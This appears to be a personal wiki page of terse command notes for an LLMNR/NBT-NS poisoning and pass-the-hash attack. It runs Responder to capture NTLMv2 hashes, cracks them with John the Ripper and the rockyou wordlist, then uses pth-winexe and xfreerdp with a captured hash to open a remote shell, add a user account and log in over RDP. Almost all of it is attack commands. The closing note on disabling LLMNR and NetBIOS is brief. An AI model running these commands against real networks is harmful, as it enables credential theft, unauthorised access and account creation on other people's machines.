User Tools

Site Tools


cyberdocs:pass_the_hash_using_responder_and_john
RESPONDER
#cd /usr/share/responder/
#python Responder.py -i 192.168.1.50 -I eth0
Simulate a user typing the wrong SMB server name using SNARE01 instead of SHARE01
Error is returned to the client machine from Responder.py that windows can not access it.
#cd logs/ ls (to comfirm if hash log file is created

JOHN
#john SMBv2-NTLMv2-SSP-192.168.1.8.txt
John hash2.txt  - -wordlist=/root/Desktop/rockyou.txt
John - -show hash2.txt
John - -show =hash2.txt
Cat john.pot
john hh.txt  - -wordlist=/root/Desktop/rockyou.txt
john hh.txt  - -show
cd  
~/.john
Cd  ~
Cd  .john

PASS the HASH
Cd pth-toolkit-master/
./pth-winexe  -U Workgroup/User%LM:NTLM  //121.0.0.1 cmd
./pth-winexe  -U Workgroup/User%LM:NTLM  //121.0.0.1  ‘net user a a /add’
pth-winexe -U Workgroup/Administrator%5274a8ac31638590:B206D78784758497FE2540F99BDF7BF0 //192.168.1.8 cmd
xfreerdp /u:administrator /d:Workgroup /pth:B206D78784758497FE2540F99BDF7BF0 /v:192.168.1.8

*How to Secure Networks against LLMNR / NBT-NS Poisoning Attacks*
The good news is this attack is fairly easy to prevent. Note, that both LLMNR and NetBIOS Name Service need to be disabled, if you only disable LLMNR then Windows will failover to NetBIOS Name Server for resolution
cyberdocs/pass_the_hash_using_responder_and_john.txt · Last modified: 2019/02/06 13:03 by dardan

Donate Powered by PHP Valid HTML5 Valid CSS Driven by DokuWiki